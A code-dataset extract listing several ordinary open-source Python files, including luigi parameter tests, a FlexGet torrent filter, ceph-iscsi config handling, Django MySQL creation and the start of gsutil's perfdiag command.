repo_name
stringlengths
5
100
ref
stringlengths
12
67
path
stringlengths
4
244
copies
stringlengths
1
8
content
stringlengths
0
1.05M
realgo/luigi
refs/heads/master
test/parameter_test.py
3
# -*- coding: utf-8 -*- # # Copyright 2012-2015 Spotify AB # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import datetime from helpers import with_config, LuigiTestCase, parsing, in_parse, RunOnceTask from datetime import timedelta import luigi import luigi.date_interval import luigi.interface import luigi.notifications from luigi.mock import MockTarget from luigi.parameter import ParameterException from worker_test import email_patch luigi.notifications.DEBUG = True class A(luigi.Task): p = luigi.IntParameter() class WithDefault(luigi.Task): x = luigi.Parameter(default='xyz') class WithDefaultTrue(luigi.Task): x = luigi.BoolParameter(default=True) class Foo(luigi.Task): bar = luigi.Parameter() p2 = luigi.IntParameter() not_a_param = "lol" class Baz(luigi.Task): bool = luigi.BoolParameter() def run(self): Baz._val = self.bool class ForgotParam(luigi.Task): param = luigi.Parameter() def run(self): pass class ForgotParamDep(luigi.Task): def requires(self): return ForgotParam() def run(self): pass class BananaDep(luigi.Task): x = luigi.Parameter() y = luigi.Parameter(default='def') def output(self): return MockTarget('banana-dep-%s-%s' % (self.x, self.y)) def run(self): self.output().open('w').close() class Banana(luigi.Task): x = luigi.Parameter() y = luigi.Parameter() style = luigi.Parameter(default=None) def requires(self): if self.style is None: return BananaDep() # will fail elif self.style == 'x-arg': return BananaDep(self.x) elif self.style == 'y-kwarg': return 
BananaDep(y=self.y) elif self.style == 'x-arg-y-arg': return BananaDep(self.x, self.y) else: raise Exception('unknown style') def output(self): return MockTarget('banana-%s-%s' % (self.x, self.y)) def run(self): self.output().open('w').close() class MyConfig(luigi.Config): mc_p = luigi.IntParameter() mc_q = luigi.IntParameter(default=73) class MyConfigWithoutSection(luigi.Config): use_cmdline_section = False mc_r = luigi.IntParameter() mc_s = luigi.IntParameter(default=99) class NoopTask(luigi.Task): pass def _value(parameter): """ A hackish way to get the "value" of a parameter. Previously Parameter exposed ``param_obj._value``. This is replacement for that so I don't need to rewrite all test cases. """ class DummyLuigiTask(luigi.Task): param = parameter return DummyLuigiTask().param class ParameterTest(LuigiTestCase): def test_default_param(self): self.assertEqual(WithDefault().x, 'xyz') def test_missing_param(self): def create_a(): return A() self.assertRaises(luigi.parameter.MissingParameterException, create_a) def test_unknown_param(self): def create_a(): return A(p=5, q=4) self.assertRaises(luigi.parameter.UnknownParameterException, create_a) def test_unknown_param_2(self): def create_a(): return A(1, 2, 3) self.assertRaises(luigi.parameter.UnknownParameterException, create_a) def test_duplicated_param(self): def create_a(): return A(5, p=7) self.assertRaises(luigi.parameter.DuplicateParameterException, create_a) def test_parameter_registration(self): self.assertEqual(len(Foo.get_params()), 2) def test_task_creation(self): f = Foo("barval", p2=5) self.assertEqual(len(f.get_params()), 2) self.assertEqual(f.bar, "barval") self.assertEqual(f.p2, 5) self.assertEqual(f.not_a_param, "lol") def test_bool_false(self): self.run_locally(['Baz']) self.assertEqual(Baz._val, False) def test_bool_true(self): self.run_locally(['Baz', '--bool']) self.assertEqual(Baz._val, True) def test_bool_default_true(self): self.assertTrue(WithDefaultTrue().x) def 
test_forgot_param(self): self.assertRaises(luigi.parameter.MissingParameterException, self.run_locally, ['ForgotParam'],) @email_patch def test_forgot_param_in_dep(self, emails): # A programmatic missing parameter will cause an error email to be sent self.run_locally(['ForgotParamDep']) self.assertNotEqual(emails, []) def test_default_param_cmdline(self): self.assertEqual(WithDefault().x, 'xyz') def test_default_param_cmdline_2(self): self.assertEqual(WithDefault().x, 'xyz') def test_insignificant_parameter(self): class InsignificantParameterTask(luigi.Task): foo = luigi.Parameter(significant=False, default='foo_default') bar = luigi.Parameter() t1 = InsignificantParameterTask(foo='x', bar='y') self.assertEqual(t1.task_id, 'InsignificantParameterTask(bar=y)') t2 = InsignificantParameterTask('u', 'z') self.assertEqual(t2.foo, 'u') self.assertEqual(t2.bar, 'z') self.assertEqual(t2.task_id, 'InsignificantParameterTask(bar=z)') def test_local_significant_param(self): """ Obviously, if anything should be positional, so should local significant parameters """ class MyTask(luigi.Task): # This could typically be "--label-company=disney" x = luigi.Parameter(significant=True) MyTask('arg') self.assertRaises(luigi.parameter.MissingParameterException, lambda: MyTask()) def test_local_insignificant_param(self): """ Ensure we have the same behavior as in before a78338c """ class MyTask(luigi.Task): # This could typically be "--num-threads=True" x = luigi.Parameter(significant=False) MyTask('arg') self.assertRaises(luigi.parameter.MissingParameterException, lambda: MyTask()) def test_nonpositional_param(self): """ Ensure we have the same behavior as in before a78338c """ class MyTask(luigi.Task): # This could typically be "--num-threads=True" x = luigi.Parameter(significant=False, positional=False) MyTask(x='arg') self.assertRaises(luigi.parameter.UnknownParameterException, lambda: MyTask('arg')) class TestNewStyleGlobalParameters(LuigiTestCase): def setUp(self): 
super(TestNewStyleGlobalParameters, self).setUp() MockTarget.fs.clear() def expect_keys(self, expected): self.assertEqual(set(MockTarget.fs.get_all_data().keys()), set(expected)) def test_x_arg(self): self.run_locally(['Banana', '--x', 'foo', '--y', 'bar', '--style', 'x-arg']) self.expect_keys(['banana-foo-bar', 'banana-dep-foo-def']) def test_x_arg_override(self): self.run_locally(['Banana', '--x', 'foo', '--y', 'bar', '--style', 'x-arg', '--BananaDep-y', 'xyz']) self.expect_keys(['banana-foo-bar', 'banana-dep-foo-xyz']) def test_x_arg_override_stupid(self): self.run_locally(['Banana', '--x', 'foo', '--y', 'bar', '--style', 'x-arg', '--BananaDep-x', 'blabla']) self.expect_keys(['banana-foo-bar', 'banana-dep-foo-def']) def test_x_arg_y_arg(self): self.run_locally(['Banana', '--x', 'foo', '--y', 'bar', '--style', 'x-arg-y-arg']) self.expect_keys(['banana-foo-bar', 'banana-dep-foo-bar']) def test_x_arg_y_arg_override(self): self.run_locally(['Banana', '--x', 'foo', '--y', 'bar', '--style', 'x-arg-y-arg', '--BananaDep-y', 'xyz']) self.expect_keys(['banana-foo-bar', 'banana-dep-foo-bar']) def test_x_arg_y_arg_override_all(self): self.run_locally(['Banana', '--x', 'foo', '--y', 'bar', '--style', 'x-arg-y-arg', '--BananaDep-y', 'xyz', '--BananaDep-x', 'blabla']) self.expect_keys(['banana-foo-bar', 'banana-dep-foo-bar']) def test_y_arg_override(self): self.run_locally(['Banana', '--x', 'foo', '--y', 'bar', '--style', 'y-kwarg', '--BananaDep-x', 'xyz']) self.expect_keys(['banana-foo-bar', 'banana-dep-xyz-bar']) def test_y_arg_override_both(self): self.run_locally(['Banana', '--x', 'foo', '--y', 'bar', '--style', 'y-kwarg', '--BananaDep-x', 'xyz', '--BananaDep-y', 'blah']) self.expect_keys(['banana-foo-bar', 'banana-dep-xyz-bar']) def test_y_arg_override_banana(self): self.run_locally(['Banana', '--y', 'bar', '--style', 'y-kwarg', '--BananaDep-x', 'xyz', '--Banana-x', 'baz']) self.expect_keys(['banana-baz-bar', 'banana-dep-xyz-bar']) class 
TestRemoveGlobalParameters(LuigiTestCase): def run_and_check(self, args): run_exit_status = self.run_locally(args) self.assertTrue(run_exit_status) return run_exit_status @parsing(['--MyConfig-mc-p', '99', '--mc-r', '55', 'NoopTask']) def test_use_config_class_1(self): self.assertEqual(MyConfig().mc_p, 99) self.assertEqual(MyConfig().mc_q, 73) self.assertEqual(MyConfigWithoutSection().mc_r, 55) self.assertEqual(MyConfigWithoutSection().mc_s, 99) @parsing(['NoopTask', '--MyConfig-mc-p', '99', '--mc-r', '55']) def test_use_config_class_2(self): self.assertEqual(MyConfig().mc_p, 99) self.assertEqual(MyConfig().mc_q, 73) self.assertEqual(MyConfigWithoutSection().mc_r, 55) self.assertEqual(MyConfigWithoutSection().mc_s, 99) @parsing(['--MyConfig-mc-p', '99', '--mc-r', '55', 'NoopTask', '--mc-s', '123', '--MyConfig-mc-q', '42']) def test_use_config_class_more_args(self): self.assertEqual(MyConfig().mc_p, 99) self.assertEqual(MyConfig().mc_q, 42) self.assertEqual(MyConfigWithoutSection().mc_r, 55) self.assertEqual(MyConfigWithoutSection().mc_s, 123) @with_config({"MyConfig": {"mc_p": "666", "mc_q": "777"}}) @parsing(['--mc-r', '555', 'NoopTask']) def test_use_config_class_with_configuration(self): self.assertEqual(MyConfig().mc_p, 666) self.assertEqual(MyConfig().mc_q, 777) self.assertEqual(MyConfigWithoutSection().mc_r, 555) self.assertEqual(MyConfigWithoutSection().mc_s, 99) @with_config({"MyConfigWithoutSection": {"mc_r": "999", "mc_s": "888"}}) @parsing(['NoopTask', '--MyConfig-mc-p', '222', '--mc-r', '555']) def test_use_config_class_with_configuration_2(self): self.assertEqual(MyConfig().mc_p, 222) self.assertEqual(MyConfig().mc_q, 73) self.assertEqual(MyConfigWithoutSection().mc_r, 555) self.assertEqual(MyConfigWithoutSection().mc_s, 888) def test_misc_1(self): class Dogs(luigi.Config): n_dogs = luigi.IntParameter() class CatsWithoutSection(luigi.Config): use_cmdline_section = False n_cats = luigi.IntParameter() with 
luigi.cmdline_parser.CmdlineParser.global_instance(['--n-cats', '123', '--Dogs-n-dogs', '456', 'WithDefault'], allow_override=True): self.assertEqual(Dogs().n_dogs, 456) self.assertEqual(CatsWithoutSection().n_cats, 123) with luigi.cmdline_parser.CmdlineParser.global_instance(['WithDefault', '--n-cats', '321', '--Dogs-n-dogs', '654'], allow_override=True): self.assertEqual(Dogs().n_dogs, 654) self.assertEqual(CatsWithoutSection().n_cats, 321) def test_global_significant_param(self): """ We don't want any kind of global param to be positional """ class MyTask(luigi.Task): # This could typically be called "--test-dry-run" x_g1 = luigi.Parameter(default='y', is_global=True, significant=True) self.assertRaises(luigi.parameter.UnknownParameterException, lambda: MyTask('arg')) def test_global_insignificant_param(self): """ We don't want any kind of global param to be positional """ class MyTask(luigi.Task): # This could typically be "--yarn-pool=development" x_g2 = luigi.Parameter(default='y', is_global=True, significant=False) self.assertRaises(luigi.parameter.UnknownParameterException, lambda: MyTask('arg')) class TestParamWithDefaultFromConfig(LuigiTestCase): def testNoSection(self): self.assertRaises(ParameterException, lambda: _value(luigi.Parameter(config_path=dict(section="foo", name="bar")))) @with_config({"foo": {}}) def testNoValue(self): self.assertRaises(ParameterException, lambda: _value(luigi.Parameter(config_path=dict(section="foo", name="bar")))) @with_config({"foo": {"bar": "baz"}}) def testDefault(self): class LocalA(luigi.Task): p = luigi.Parameter(config_path=dict(section="foo", name="bar")) self.assertEqual("baz", LocalA().p) self.assertEqual("boo", LocalA(p="boo").p) @with_config({"foo": {"bar": "2001-02-03T04"}}) def testDateHour(self): p = luigi.DateHourParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(datetime.datetime(2001, 2, 3, 4, 0, 0), _value(p)) @with_config({"foo": {"bar": "2001-02-03T0430"}}) def 
testDateMinute(self): p = luigi.DateMinuteParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(datetime.datetime(2001, 2, 3, 4, 30, 0), _value(p)) @with_config({"foo": {"bar": "2001-02-03T04H30"}}) def testDateMinuteDeprecated(self): p = luigi.DateMinuteParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(datetime.datetime(2001, 2, 3, 4, 30, 0), _value(p)) @with_config({"foo": {"bar": "2001-02-03"}}) def testDate(self): p = luigi.DateParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(datetime.date(2001, 2, 3), _value(p)) @with_config({"foo": {"bar": "2015-07"}}) def testMonthParameter(self): p = luigi.MonthParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(datetime.date(2015, 7, 1), _value(p)) @with_config({"foo": {"bar": "2015"}}) def testYearParameter(self): p = luigi.YearParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(datetime.date(2015, 1, 1), _value(p)) @with_config({"foo": {"bar": "123"}}) def testInt(self): p = luigi.IntParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(123, _value(p)) @with_config({"foo": {"bar": "true"}}) def testBool(self): p = luigi.BoolParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(True, _value(p)) @with_config({"foo": {"bar": "false"}}) def testBoolConfigOutranksDefault(self): p = luigi.BoolParameter(default=True, config_path=dict(section="foo", name="bar")) self.assertEqual(False, _value(p)) @with_config({"foo": {"bar": "2001-02-03-2001-02-28"}}) def testDateInterval(self): p = luigi.DateIntervalParameter(config_path=dict(section="foo", name="bar")) expected = luigi.date_interval.Custom.parse("2001-02-03-2001-02-28") self.assertEqual(expected, _value(p)) @with_config({"foo": {"bar": "1 day"}}) def testTimeDelta(self): p = luigi.TimeDeltaParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(timedelta(days=1), _value(p)) @with_config({"foo": {"bar": "2 seconds"}}) def 
testTimeDeltaPlural(self): p = luigi.TimeDeltaParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(timedelta(seconds=2), _value(p)) @with_config({"foo": {"bar": "3w 4h 5m"}}) def testTimeDeltaMultiple(self): p = luigi.TimeDeltaParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(timedelta(weeks=3, hours=4, minutes=5), _value(p)) @with_config({"foo": {"bar": "P4DT12H30M5S"}}) def testTimeDelta8601(self): p = luigi.TimeDeltaParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(timedelta(days=4, hours=12, minutes=30, seconds=5), _value(p)) @with_config({"foo": {"bar": "P5D"}}) def testTimeDelta8601NoTimeComponent(self): p = luigi.TimeDeltaParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(timedelta(days=5), _value(p)) @with_config({"foo": {"bar": "P5W"}}) def testTimeDelta8601Weeks(self): p = luigi.TimeDeltaParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(timedelta(weeks=5), _value(p)) @with_config({"foo": {"bar": "P3Y6M4DT12H30M5S"}}) def testTimeDelta8601YearMonthNotSupported(self): def f(): return _value(luigi.TimeDeltaParameter(config_path=dict(section="foo", name="bar"))) self.assertRaises(luigi.parameter.ParameterException, f) # ISO 8601 durations with years or months are not supported @with_config({"foo": {"bar": "PT6M"}}) def testTimeDelta8601MAfterT(self): p = luigi.TimeDeltaParameter(config_path=dict(section="foo", name="bar")) self.assertEqual(timedelta(minutes=6), _value(p)) @with_config({"foo": {"bar": "P6M"}}) def testTimeDelta8601MBeforeT(self): def f(): return _value(luigi.TimeDeltaParameter(config_path=dict(section="foo", name="bar"))) self.assertRaises(luigi.parameter.ParameterException, f) # ISO 8601 durations with months are not supported def testHasDefaultNoSection(self): self.assertRaises(luigi.parameter.MissingParameterException, lambda: _value(luigi.Parameter(config_path=dict(section="foo", name="bar")))) @with_config({"foo": {}}) def 
testHasDefaultNoValue(self): self.assertRaises(luigi.parameter.MissingParameterException, lambda: _value(luigi.Parameter(config_path=dict(section="foo", name="bar")))) @with_config({"foo": {"bar": "baz"}}) def testHasDefaultWithBoth(self): self.assertTrue(_value(luigi.Parameter(config_path=dict(section="foo", name="bar")))) @with_config({"foo": {"bar": "baz"}}) def testWithDefault(self): p = luigi.Parameter(config_path=dict(section="foo", name="bar"), default='blah') self.assertEqual('baz', _value(p)) # config overrides default def testWithDefaultAndMissing(self): p = luigi.Parameter(config_path=dict(section="foo", name="bar"), default='blah') self.assertEqual('blah', _value(p)) @with_config({"LocalA": {"p": "p_default"}}) def testDefaultFromTaskName(self): class LocalA(luigi.Task): p = luigi.Parameter() self.assertEqual("p_default", LocalA().p) self.assertEqual("boo", LocalA(p="boo").p) @with_config({"LocalA": {"p": "999"}}) def testDefaultFromTaskNameInt(self): class LocalA(luigi.Task): p = luigi.IntParameter() self.assertEqual(999, LocalA().p) self.assertEqual(777, LocalA(p=777).p) @with_config({"LocalA": {"p": "p_default"}, "foo": {"bar": "baz"}}) def testDefaultFromConfigWithTaskNameToo(self): class LocalA(luigi.Task): p = luigi.Parameter(config_path=dict(section="foo", name="bar")) self.assertEqual("p_default", LocalA().p) self.assertEqual("boo", LocalA(p="boo").p) @with_config({"LocalA": {"p": "p_default_2"}}) def testDefaultFromTaskNameWithDefault(self): class LocalA(luigi.Task): p = luigi.Parameter(default="banana") self.assertEqual("p_default_2", LocalA().p) self.assertEqual("boo_2", LocalA(p="boo_2").p) @with_config({"MyClass": {"p_wohoo": "p_default_3"}}) def testWithLongParameterName(self): class MyClass(luigi.Task): p_wohoo = luigi.Parameter(default="banana") self.assertEqual("p_default_3", MyClass().p_wohoo) self.assertEqual("boo_2", MyClass(p_wohoo="boo_2").p_wohoo) @with_config({"RangeDaily": {"days_back": "123"}}) def testSettingOtherMember(self): 
class LocalA(luigi.Task): pass self.assertEqual(123, luigi.tools.range.RangeDaily(of=LocalA).days_back) self.assertEqual(70, luigi.tools.range.RangeDaily(of=LocalA, days_back=70).days_back) @with_config({"MyClass": {"p_not_global": "123"}}) def testCommandLineWithDefault(self): """ Verify that we also read from the config when we build tasks from the command line parsers. """ class MyClass(luigi.Task): p_not_global = luigi.Parameter(default='banana') def complete(self): import sys luigi.configuration.get_config().write(sys.stdout) if self.p_not_global != "123": raise ValueError("The parameter didn't get set!!") return True def run(self): pass self.assertTrue(self.run_locally(['MyClass'])) self.assertFalse(self.run_locally(['MyClass', '--p-not-global', '124'])) self.assertFalse(self.run_locally(['MyClass', '--MyClass-p-not-global', '124'])) @with_config({"MyClass2": {"p_not_global_no_default": "123"}}) def testCommandLineNoDefault(self): """ Verify that we also read from the config when we build tasks from the command line parsers. """ class MyClass2(luigi.Task): """ TODO: Make luigi clean it's register for tests. Hate this 2 dance. 
""" p_not_global_no_default = luigi.Parameter() def complete(self): import sys luigi.configuration.get_config().write(sys.stdout) luigi.configuration.get_config().write(sys.stdout) if self.p_not_global_no_default != "123": raise ValueError("The parameter didn't get set!!") return True def run(self): pass self.assertTrue(self.run_locally(['MyClass2'])) self.assertFalse(self.run_locally(['MyClass2', '--p-not-global-no-default', '124'])) self.assertFalse(self.run_locally(['MyClass2', '--MyClass2-p-not-global-no-default', '124'])) @with_config({"mynamespace.A": {"p": "999"}}) def testWithNamespaceConfig(self): class A(luigi.Task): task_namespace = 'mynamespace' p = luigi.IntParameter() self.assertEqual(999, A().p) self.assertEqual(777, A(p=777).p) def testWithNamespaceCli(self): class A(luigi.Task): task_namespace = 'mynamespace' p = luigi.IntParameter(default=100) expected = luigi.IntParameter() def complete(self): if self.p != self.expected: raise ValueError return True self.assertTrue(self.run_locally_split('mynamespace.A --expected 100')) # TODO(arash): Why is `--p 200` hanging with multiprocessing stuff? 
# self.assertTrue(self.run_locally_split('mynamespace.A --p 200 --expected 200')) self.assertTrue(self.run_locally_split('mynamespace.A --mynamespace.A-p 200 --expected 200')) self.assertFalse(self.run_locally_split('mynamespace.A --A-p 200 --expected 200')) class OverrideEnvStuff(LuigiTestCase): @with_config({"core": {"default-scheduler-port": '6543'}}) def testOverrideSchedulerPort(self): env_params = luigi.interface.core() self.assertEqual(env_params.scheduler_port, 6543) @with_config({"core": {"scheduler-port": '6544'}}) def testOverrideSchedulerPort2(self): env_params = luigi.interface.core() self.assertEqual(env_params.scheduler_port, 6544) @with_config({"core": {"scheduler_port": '6545'}}) def testOverrideSchedulerPort3(self): env_params = luigi.interface.core() self.assertEqual(env_params.scheduler_port, 6545) class TestSerializeDateParameters(LuigiTestCase): def testSerialize(self): date = datetime.date(2013, 2, 3) self.assertEqual(luigi.DateParameter().serialize(date), '2013-02-03') self.assertEqual(luigi.YearParameter().serialize(date), '2013') self.assertEqual(luigi.MonthParameter().serialize(date), '2013-02') dt = datetime.datetime(2013, 2, 3, 4, 5) self.assertEqual(luigi.DateHourParameter().serialize(dt), '2013-02-03T04') class TestTaskParameter(LuigiTestCase): def testUsage(self): class MetaTask(luigi.Task): task_namespace = "mynamespace" a = luigi.TaskParameter() def run(self): self.__class__.saved_value = self.a class OtherTask(luigi.Task): task_namespace = "other_namespace" self.assertEqual(MetaTask(a=MetaTask).a, MetaTask) self.assertEqual(MetaTask(a=OtherTask).a, OtherTask) # So I first thought this "should" work, but actually it should not, # because it should not need to parse values known at run-time self.assertNotEqual(MetaTask(a="mynamespace.MetaTask").a, MetaTask) # But is should be able to parse command line arguments self.assertRaises(luigi.task_register.TaskClassNotFoundException, lambda: (self.run_locally_split('mynamespace.MetaTask 
--a blah'))) self.assertRaises(luigi.task_register.TaskClassNotFoundException, lambda: (self.run_locally_split('mynamespace.MetaTask --a Taskk'))) self.assertTrue(self.run_locally_split('mynamespace.MetaTask --a mynamespace.MetaTask')) self.assertEqual(MetaTask.saved_value, MetaTask) self.assertTrue(self.run_locally_split('mynamespace.MetaTask --a other_namespace.OtherTask')) self.assertEqual(MetaTask.saved_value, OtherTask) class NewStyleParameters822Test(LuigiTestCase): """ I bet these tests created at 2015-03-08 are reduntant by now (Oct 2015). But maintaining them anyway, just in case I have overlooked something. """ # See https://github.com/spotify/luigi/issues/822 def test_subclasses(self): class BarBaseClass(luigi.Task): x = luigi.Parameter(default='bar_base_default') class BarSubClass(BarBaseClass): pass in_parse(['BarSubClass', '--x', 'xyz', '--BarBaseClass-x', 'xyz'], lambda task: self.assertEqual(task.x, 'xyz')) # https://github.com/spotify/luigi/issues/822#issuecomment-77782714 in_parse(['BarBaseClass', '--BarBaseClass-x', 'xyz'], lambda task: self.assertEqual(task.x, 'xyz')) class LocalParameters1304Test(LuigiTestCase): """ It was discussed and decided that local parameters (--x) should be semantically different from global parameters (--MyTask-x). The former sets only the parsed root task, and the later sets the parameter for all the tasks. 
https://github.com/spotify/luigi/issues/1304#issuecomment-148402284 """ def test_local_params(self): class MyTask(RunOnceTask): param1 = luigi.IntParameter() param2 = luigi.BoolParameter(default=False) def requires(self): if self.param1 > 0: yield MyTask(param1=(self.param1 - 1)) def run(self): assert self.param1 == 1 or not self.param2 self.comp = True self.assertTrue(self.run_locally_split('MyTask --param1 1 --param2')) def test_local_takes_precedence(self): class MyTask(luigi.Task): param = luigi.IntParameter() def complete(self): return False def run(self): assert self.param == 5 self.assertTrue(self.run_locally_split('MyTask --param 5 --MyTask-param 6')) def test_local_only_affects_root(self): class MyTask(RunOnceTask): param = luigi.IntParameter(default=3) def requires(self): assert self.param != 3 if self.param == 5: yield MyTask() # It would be a cyclic dependency if local took precedence self.assertTrue(self.run_locally_split('MyTask --param 5 --MyTask-param 6')) def test_range_doesnt_propagate_args(self): """ Ensure that ``--task Range --of Blah --blah-arg 123`` doesn't work. This will of course not work unless support is explicitly added for it. But being a bit paranoid here and adding this test case so that if somebody decides to add it in the future, they'll be redircted to the dicussion in #1304 """ class Blah(RunOnceTask): date = luigi.DateParameter() blah_arg = luigi.IntParameter() # The SystemExit is assumed to be thrown by argparse self.assertRaises(SystemExit, self.run_locally_split, 'RangeDailyBase --of Blah --start 2015-01-01 --task-limit 1 --blah-arg 123') self.assertTrue(self.run_locally_split('RangeDailyBase --of Blah --start 2015-01-01 --task-limit 1 --Blah-blah-arg 123')) class TaskAsParameterName1335Test(LuigiTestCase): def test_parameter_can_be_named_task(self): class MyTask(luigi.Task): # Indeed, this is not the most realistic example, but still ... task = luigi.IntParameter() self.assertTrue(self.run_locally_split('MyTask --task 5'))
caot/intellij-community
refs/heads/master
python/testData/fillParagraph/docstringOneParagraph_after.py
83
__author__ = 'ktisha' def foo(): """ This is my docstring. There are many like it, but this one mine. My docstring is my best friend. it is my life. I must master it as I must master my life. This is my docstring. There are many like it, but this one mine. My docstring is my best friend. it is my life. I must master it as I must master my life. """
BrainDamage/Flexget
refs/heads/develop
flexget/plugins/filter/private_torrents.py
11
from __future__ import unicode_literals, division, absolute_import import logging from flexget import plugin from flexget.event import event log = logging.getLogger('priv_torrents') class FilterPrivateTorrents(object): """How to handle private torrents. private_torrents: yes|no Example:: private_torrents: no This would reject all torrent entries with private flag. Example:: private_torrents: yes This would reject all public torrents. Non-torrent content is not interviened. """ schema = {'type': 'boolean'} @plugin.priority(127) def on_task_modify(self, task, config): private_torrents = config for entry in task.accepted: if not 'torrent' in entry: log.debug('`%s` is not a torrent' % entry['title']) continue private = entry['torrent'].private if not private_torrents and private: entry.reject('torrent is marked as private', remember=True) elif private_torrents and not private: entry.reject('public torrent', remember=True) @event('plugin.register') def register_plugin(): plugin.register(FilterPrivateTorrents, 'private_torrents', api_ver=2)
pcuzner/ceph-iscsi-config
refs/heads/master
ceph_iscsi_config/gateway_object.py
1
#!/usr/bin/env python import ceph_iscsi_config.settings as settings from ceph_iscsi_config.common import Config from ceph_iscsi_config.utils import CephiSCSIError class GWObject(object): def __init__(self, cfg_type, cfg_type_key, logger, control_settings): self.control_settings = control_settings self.cfg_type = cfg_type self.cfg_type_key = cfg_type_key self.logger = logger self.config = Config(self.logger) if self.config.error: raise CephiSCSIError(self.config.error_msg) # Copy of controls that will not be written until commit is called. # To update the kernel call the child object's update function. self.controls = self._get_config_controls().copy() self._add_properies() def _set_config_controls(self, config, controls): if self.cfg_type_key: config.config[self.cfg_type][self.cfg_type_key]['controls'] = controls else: config.config['controls'] = controls def _get_config_controls(self): # global controls if self.cfg_type == 'controls': return self.config.config.get('controls', {}) # This might be the initial creation so it will not be in the # config yet if self.cfg_type_key in self.config.config[self.cfg_type]: return self.config.config[self.cfg_type][self.cfg_type_key].get('controls', {}) else: return {} def _get_control(self, key): value = self.controls.get(key, None) if value is not None: value = settings.Settings.normalize(key, value) if value is None: return getattr(settings.config, key) return value def _set_control(self, key, value): if value is None or \ settings.Settings.normalize(key, value) == getattr(settings.config, key): self.controls.pop(key, None) else: self.controls[key] = value def _add_properies(self): for k in self.control_settings: setattr(GWObject, k, property(lambda self, k=k: self._get_control(k), lambda self, v, k=k: self._set_control(k, v))) def commit_controls(self): committed_controls = self._get_config_controls() if self.controls != committed_controls: # update our config self._set_config_controls(self.config, self.controls) # update 
remote config if self.cfg_type == 'controls': self.config.update_item(self.cfg_type, self.cfg_type_key, self.controls) else: updated_obj = self.config.config[self.cfg_type][self.cfg_type_key] self.config.update_item(self.cfg_type, self.cfg_type_key, updated_obj) self.config.commit() if self.config.error: raise CephiSCSIError(self.config.error_msg)
yqm/sl4a
refs/heads/master
python/src/Tools/i18n/makelocalealias.py
52
#!/usr/bin/env python """ Convert the X11 locale.alias file into a mapping dictionary suitable for locale.py. Written by Marc-Andre Lemburg <mal@genix.com>, 2004-12-10. """ import locale # Location of the alias file LOCALE_ALIAS = '/usr/lib/X11/locale/locale.alias' def parse(filename): f = open(filename) lines = f.read().splitlines() data = {} for line in lines: line = line.strip() if not line: continue if line[:1] == '#': continue locale, alias = line.split() # Strip ':' if locale[-1] == ':': locale = locale[:-1] # Lower-case locale locale = locale.lower() # Ignore one letter locale mappings (except for 'c') if len(locale) == 1 and locale != 'c': continue # Normalize encoding, if given if '.' in locale: lang, encoding = locale.split('.')[:2] encoding = encoding.replace('-', '') encoding = encoding.replace('_', '') locale = lang + '.' + encoding if encoding.lower() == 'utf8': # Ignore UTF-8 mappings - this encoding should be # available for all locales continue data[locale] = alias return data def pprint(data): items = data.items() items.sort() for k,v in items: print ' %-40s%r,' % ('%r:' % k, v) def print_differences(data, olddata): items = olddata.items() items.sort() for k, v in items: if not data.has_key(k): print '# removed %r' % k elif olddata[k] != data[k]: print '# updated %r -> %r to %r' % \ (k, olddata[k], data[k]) # Additions are not mentioned if __name__ == '__main__': data = locale.locale_alias.copy() data.update(parse(LOCALE_ALIAS)) print_differences(data, locale.locale_alias) print print 'locale_alias = {' pprint(data) print '}'
jasonbot/django
refs/heads/master
django/db/backends/mysql/creation.py
193
from django.db.backends.base.creation import BaseDatabaseCreation


class DatabaseCreation(BaseDatabaseCreation):
    """MySQL-specific test-database creation behavior."""

    def sql_table_creation_suffix(self):
        """Return the SQL suffix appended when creating the test database.

        Builds 'CHARACTER SET ...' and/or 'COLLATE ...' clauses from the
        database's TEST settings; yields an empty string when neither is
        configured.
        """
        test_settings = self.connection.settings_dict['TEST']
        clauses = [
            template % value
            for template, value in (
                ('CHARACTER SET %s', test_settings['CHARSET']),
                ('COLLATE %s', test_settings['COLLATION']),
            )
            if value
        ]
        return ' '.join(clauses)
benhylau/cjdns
refs/heads/master
node_build/dependencies/libuv/build/gyp/test/win/gyptest-cl-calling-convention.py
108
#!/usr/bin/env python # Copyright (c) 2014 Google Inc. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Make sure calling convention setting is extracted properly. """ import TestGyp import sys if sys.platform == 'win32': test = TestGyp.TestGyp(formats=['msvs', 'ninja']) CHDIR = 'compiler-flags' test.run_gyp('calling-convention.gyp', chdir=CHDIR) test.build('calling-convention.gyp', test.ALL, chdir=CHDIR) test.pass_test()
Allow2CEO/browser-ios
refs/heads/master
brave/node_modules/hashset-cpp/vendor/depot_tools/third_party/gsutil/gslib/commands/perfdiag.py
51
# Copyright 2012 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Contains the perfdiag gsutil command.""" import calendar from collections import defaultdict import contextlib import datetime import json import math import multiprocessing import os import re import socket import string import subprocess import tempfile import time import boto.gs.connection from gslib.command import Command from gslib.command import COMMAND_NAME from gslib.command import COMMAND_NAME_ALIASES from gslib.command import CONFIG_REQUIRED from gslib.command import FILE_URIS_OK from gslib.command import MAX_ARGS from gslib.command import MIN_ARGS from gslib.command import PROVIDER_URIS_OK from gslib.command import 